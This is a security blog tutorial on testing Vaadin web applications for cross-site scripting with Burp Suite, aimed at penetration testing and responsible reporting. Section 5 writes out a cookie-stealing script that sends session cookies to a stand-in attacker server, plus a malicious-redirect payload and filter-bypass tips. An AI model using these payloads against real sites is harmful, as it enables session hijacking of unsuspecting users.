Blog | G5 Cyber Security

Burp Suite: XSS in Vaadin

G5 Cyber Security

TL;DR

This guide shows you how to find Cross-Site Scripting (XSS) vulnerabilities in applications built with the Vaadin framework using Burp Suite. We’ll focus on identifying and exploiting common injection points.

1. Understanding Vaadin & XSS

Vaadin is a Java web framework for building rich internet applications. It handles much of the client-side communication, but this doesn’t automatically prevent XSS. Data still needs to be properly sanitised before being displayed.

XSS happens when an attacker injects malicious JavaScript code into a website viewed by other users. This can steal cookies, redirect users, or modify page content.

2. Setting up Burp Suite

  1. Install and Configure: Download and install Burp Suite (Community Edition is sufficient for basic testing). Configure your browser to use Burp as a proxy.
  2. Intercepting Traffic: Ensure Burp Suite is intercepting all HTTP(S) traffic between your browser and the Vaadin application. You should see requests appear in the ‘Proxy’ tab.

3. Identifying Potential Injection Points

Vaadin applications often use components like TextField, TextArea, and Label to display user input. These are prime candidates for XSS vulnerabilities.

  1. Explore the Application: Thoroughly navigate the Vaadin application, interacting with all input fields and features.
  2. Focus on User Input: Pay close attention to any field where you can enter text or data that is later displayed back to you (e.g., search boxes, comments, forms).

4. Basic XSS Payload Testing

Start with simple payloads to confirm if the application is vulnerable.

  1. Simple Alert: Try injecting a basic JavaScript alert box payload in an input field: 
    <script>alert('XSS')</script>
  2. Intercept and Modify: In Burp Suite’s ‘Proxy’ tab, intercept the request containing your payload. Forward this modified request to the server.
    1. Right-click on the request in the Proxy history.
    2. Select “Send to Repeater”.
    3. In Repeater, modify the parameter value with your XSS payload and send it.
  3. Check Response: Examine the server’s response. If you see an alert box pop up in your browser, you’ve found a basic XSS vulnerability.

5. Advanced Payload Testing

If simple alerts work, try more sophisticated payloads to demonstrate impact.

  1. Cookie Stealing: Attempt to steal the user’s session cookie: 
    <script>document.location='http://your-evil-server.com/?cookie='+document.cookie;</script>

    (Replace http://your-evil-server.com/ with your own server.)

  2. Redirecting Users: Try redirecting the user to a malicious website: 
    <script>window.location='http://your-malicious-website.com/';</script>

    (Replace http://your-malicious-website.com/ with your own server.)

  3. Bypass Filters: Vaadin applications may have input filters. Try bypassing these using techniques like:
    • Encoding (HTML entities, URL encoding)
    • Case variations (e.g., <ScRiPt>)
    • Using different event handlers (e.g., onload instead of onclick)

6. Using Burp Suite Scanner

Burp Suite’s scanner can automate some XSS detection.

  1. Scan Target: Right-click on a request in the Proxy history and select “Actively scan this host”.
  2. Configure Scan: Adjust scan settings as needed (e.g., crawl depth, attack vectors).
  3. Review Results: Examine the scanner’s results for potential XSS vulnerabilities. Be sure to manually verify any reported issues.

7. Reporting Vulnerabilities

If you find an XSS vulnerability, report it responsibly to the application developers. Include detailed steps to reproduce the issue and the payloads used.

Exit mobile version